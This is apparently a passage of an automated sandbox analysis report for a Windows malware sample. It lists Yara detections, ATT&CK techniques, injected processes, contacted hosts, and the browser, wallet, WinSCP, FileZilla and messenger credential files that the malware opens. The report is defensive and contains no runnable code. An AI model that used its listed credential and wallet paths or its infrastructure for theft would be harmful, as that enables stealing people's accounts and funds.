                      Source: Yara matchFile source: 00000020.00000002.791144627.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.542369400.000000000070F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.463369544.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.533006922.000000000D292000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.466345682.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.775109103.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.541178072.0000000000701000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.562231967.0000000000714000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: B4A7.exe PID: 3080, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: F771.exe PID: 5640, type: MEMORYSTR
                      Source: Yara matchFile source: 0000000E.00000002.793487100.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
                      Source: Yara matchFile source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTR
                      Source: Yara matchFile source: 24.2.E35A.exe.12094a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.E35A.exe.bb0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.E35A.exe.12094a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.816564354.0000000001209000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.770728847.0000000000131000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.773922476.0000000000111000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5816, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5876, type: MEMORYSTR
                      Source: Yara matchFile source: 11.3.cttgcew.870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.q4Z52wRd28.exe.970000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.q4Z52wRd28.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.cttgcew.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.q4Z52wRd28.exe.960e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.cttgcew.860e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.256917988.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.381680800.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0000000E.00000002.806199493.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.793487100.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.805707000.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.603169508.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rovwer.exe PID: 4852, type: MEMORYSTR
                      Source: Yara matchFile source: 36.2.EB2B.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.EB2B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.519975927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: EB2B.exe PID: 5512, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EB2B.exe PID: 5628, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EB2B.exe PID: 5828, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                      Source: EB2B.exe, 00000024.00000002.578719399.00000000272D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets\default_wallet
                      Source: F771.exe, 00000020.00000002.855319857.0000000002C0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wk-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                      Source: EB2B.exe, 00000024.00000002.578719399.00000000272D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
                      Source: EB2B.exe, 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Web3 Wallet
                      Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                      Source: EB2B.exe, 00000024.00000002.578719399.00000000272D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets\default_wallet
                      Source: EB2B.exe, 00000024.00000002.578719399.00000000272D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
                      Source: F771.exe, 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??????
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??????
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\??????
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\??????
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\??????
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\??????
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\??????
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\??????
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
                      Source: Yara matchFile source: 00000024.00000002.522046166.000000000127B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: F771.exe PID: 5640, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 32.3.F771.exe.9c6b90.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.B4A7.exe.716f68.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.B4A7.exe.716f68.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.B4A7.exe.d290000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.F771.exe.9c6b90.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.27a0ee8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.B4A7.exe.716f68.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.F771.exe.8c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.B4A7.exe.d290000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.880e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.27a0ee8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.B4A7.exe.716f68.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.B4A7.exe.d290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.27a0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.B4A7.exe.716f68.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.267a196.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.267b07e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.267b07e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.B4A7.exe.716f68.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.267a196.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.F771.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000020.00000002.791144627.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.542369400.000000000070F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.463369544.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.533006922.000000000D292000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.466345682.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.775109103.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.541178072.0000000000701000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.562231967.0000000000714000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: B4A7.exe PID: 3080, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: F771.exe PID: 5640, type: MEMORYSTR
                      Source: Yara matchFile source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTR
                      Source: Yara matchFile source: 24.2.E35A.exe.12094a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.E35A.exe.bb0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.E35A.exe.12094a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.816564354.0000000001209000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.770728847.0000000000131000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.773922476.0000000000111000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5816, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5876, type: MEMORYSTR
                      Source: Yara matchFile source: 11.3.cttgcew.870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.q4Z52wRd28.exe.970000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.q4Z52wRd28.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.cttgcew.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.q4Z52wRd28.exe.960e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.cttgcew.860e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.256917988.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.381680800.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 36.2.EB2B.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.EB2B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.519975927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: EB2B.exe PID: 5512, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EB2B.exe PID: 5628, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EB2B.exe PID: 5828, type: MEMORYSTR
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts311
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      Exploitation for Privilege Escalation
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium15
                      Ingress Tool Transfer
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts1
                      Exploitation for Client Execution
                      1
                      Scheduled Task/Job
                      1
                      DLL Side-Loading
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      1
                      Account Discovery
                      Remote Desktop Protocol4
                      Data from Local System
                      Exfiltration Over Bluetooth11
                      Encrypted Channel
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Scheduled Task/Job
                      1
                      Registry Run Keys / Startup Folder
                      912
                      Process Injection
                      31
                      Obfuscated Files or Information
                      2
                      Credentials in Registry
                      3
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Screen Capture
                      Automated Exfiltration11
                      Non-Standard Port
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)1
                      Services File Permissions Weakness
                      1
                      Scheduled Task/Job
                      23
                      Software Packing
                      1
                      Credentials In Files
                      147
                      System Information Discovery
                      Distributed Component Object Model1
                      Email Collection
                      Scheduled Transfer5
                      Non-Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon Script1
                      Registry Run Keys / Startup Folder
                      1
                      DLL Side-Loading
                      LSA Secrets441
                      Security Software Discovery
                      SSH1
                      Input Capture
                      Data Transfer Size Limits126
                      Application Layer Protocol
                      Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.common1
                      Services File Permissions Weakness
                      1
                      File Deletion
                      Cached Domain Credentials331
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                      Masquerading
                      DCSync13
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job331
                      Virtualization/Sandbox Evasion
                      Proc Filesystem1
                      Application Window Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)912
                      Process Injection
                      /etc/passwd and /etc/shadow1
                      System Owner/User Discovery
                      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      Hidden Files and Directories
                      Network Sniffing1
                      Remote System Discovery
                      Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                      Services File Permissions Weakness
                      Input Capture1
                      System Network Configuration Discovery
                      Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                      Rundll32
                      KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 749948 Sample: q4Z52wRd28.exe Startdate: 19/11/2022 Architecture: WINDOWS Score: 100 84 iujdhsndjfks.ru 2->84 112 Snort IDS alert for network traffic 2->112 114 Multi AV Scanner detection for domain / URL 2->114 116 Malicious sample detected (through community Yara rule) 2->116 118 15 other signatures 2->118 12 q4Z52wRd28.exe 2->12         started        15 cttgcew 2->15         started        17 rovwer.exe 2->17         started        signatures3 process4 signatures5 166 Detected unpacking (changes PE section rights) 12->166 168 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->168 170 Maps a DLL or memory area into another process 12->170 172 Creates a thread in another existing process (thread injection) 12->172 19 explorer.exe 15 12->19 injected 174 Multi AV Scanner detection for dropped file 15->174 176 Machine Learning detection for dropped file 15->176 178 Checks if the current machine is a virtual machine (disk enumeration) 15->178 process6 dnsIp7 86 cdn-102.anonfiles.com 195.96.151.51, 443, 49714 UTA-ASAT unknown 19->86 88 srshf.com 108.167.141.212, 443, 49703 UNIFIEDLAYER-AS-1US United States 19->88 90 13 other IPs or domains 19->90 70 C:\Users\user\AppData\Roaming\cttgcew, PE32 19->70 dropped 72 C:\Users\user\AppData\Local\Temp\F771.exe, PE32 19->72 dropped 74 C:\Users\user\AppData\Local\TempB2B.exe, PE32 19->74 dropped 76 5 other malicious files 19->76 dropped 120 System process connects to network (likely due to code injection or exploit) 19->120 122 Benign windows process drops PE files 19->122 124 May check the online IP address of the machine 19->124 126 4 other signatures 19->126 24 A852.exe 3 19->24         started        28 CF35.exe 19->28         started        30 B4A7.exe 6 19->30         started        33 12 other processes 19->33 file8 signatures9 process10 dnsIp11 82 C:\Users\user\AppData\Local\...\rovwer.exe, PE32 24->82 dropped 140 Detected unpacking (changes PE section rights) 24->140 142 Detected unpacking (overwrites its own PE header) 24->142 144 Machine Learning detection for dropped file 24->144 146 Contains functionality to inject code into remote processes 24->146 35 rovwer.exe 18 24->35         started        148 Multi AV Scanner detection for dropped file 28->148 150 Writes to foreign memory regions 28->150 152 Allocates memory in foreign processes 28->152 154 Modifies the context of a thread in another process (thread injection) 28->154 40 RegSvcs.exe 28->40         started        106 2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhq 30->106 156 Opens the same file many times (likely Sandbox evasion) 30->156 158 Injects a PE file into a foreign processes 30->158 108 185.106.92.111 SUPERSERVERSDATACENTERRU Russian Federation 33->108 110 lentaphoto.at 33->110 160 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 33->160 162 Writes or reads registry keys via WMI 33->162 164 Writes registry values via WMI 33->164 42 EB2B.exe 33->42         started        file12 signatures13 process14 dnsIp15 92 193.56.146.174, 49744, 49745, 49746 LVLT-10753US unknown 35->92 78 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32 35->78 dropped 80 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32 35->80 dropped 128 Detected unpacking (changes PE section rights) 35->128 130 Detected unpacking (overwrites its own PE header) 35->130 132 Creates an undocumented autostart registry key 35->132 138 2 other signatures 35->138 44 rundll32.exe 35->44         started        48 cmd.exe 1 35->48         started        50 schtasks.exe 1 35->50         started        94 youtube-ui.l.google.com 216.58.215.238 GOOGLEUS United States 40->94 96 65.21.213.208 CP-ASDE United States 40->96 98 www.youtube.com 40->98 134 Tries to harvest and steal browser information (history, passwords, etc) 40->134 136 Injects a PE file into a foreign processes 42->136 52 EB2B.exe 42->52         started        file16 signatures17 process18 dnsIp19 100 192.168.2.3, 443, 49683, 49689 unknown unknown 44->100 180 System process connects to network (likely due to code injection or exploit) 44->180 182 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 44->182 184 Tries to steal Instant Messenger accounts or passwords 44->184 190 2 other signatures 44->190 54 conhost.exe 48->54         started        56 cmd.exe 1 48->56         started        58 cmd.exe 1 48->58         started        64 4 other processes 48->64 60 conhost.exe 50->60         started        102 t.me 149.154.167.99, 443, 49743 TELEGRAMRU United Kingdom 52->102 104 116.202.5.101, 49754, 80 HETZNER-ASDE Germany 52->104 186 Tries to harvest and steal browser information (history, passwords, etc) 52->186 188 Tries to steal Crypto Currency Wallets 52->188 62 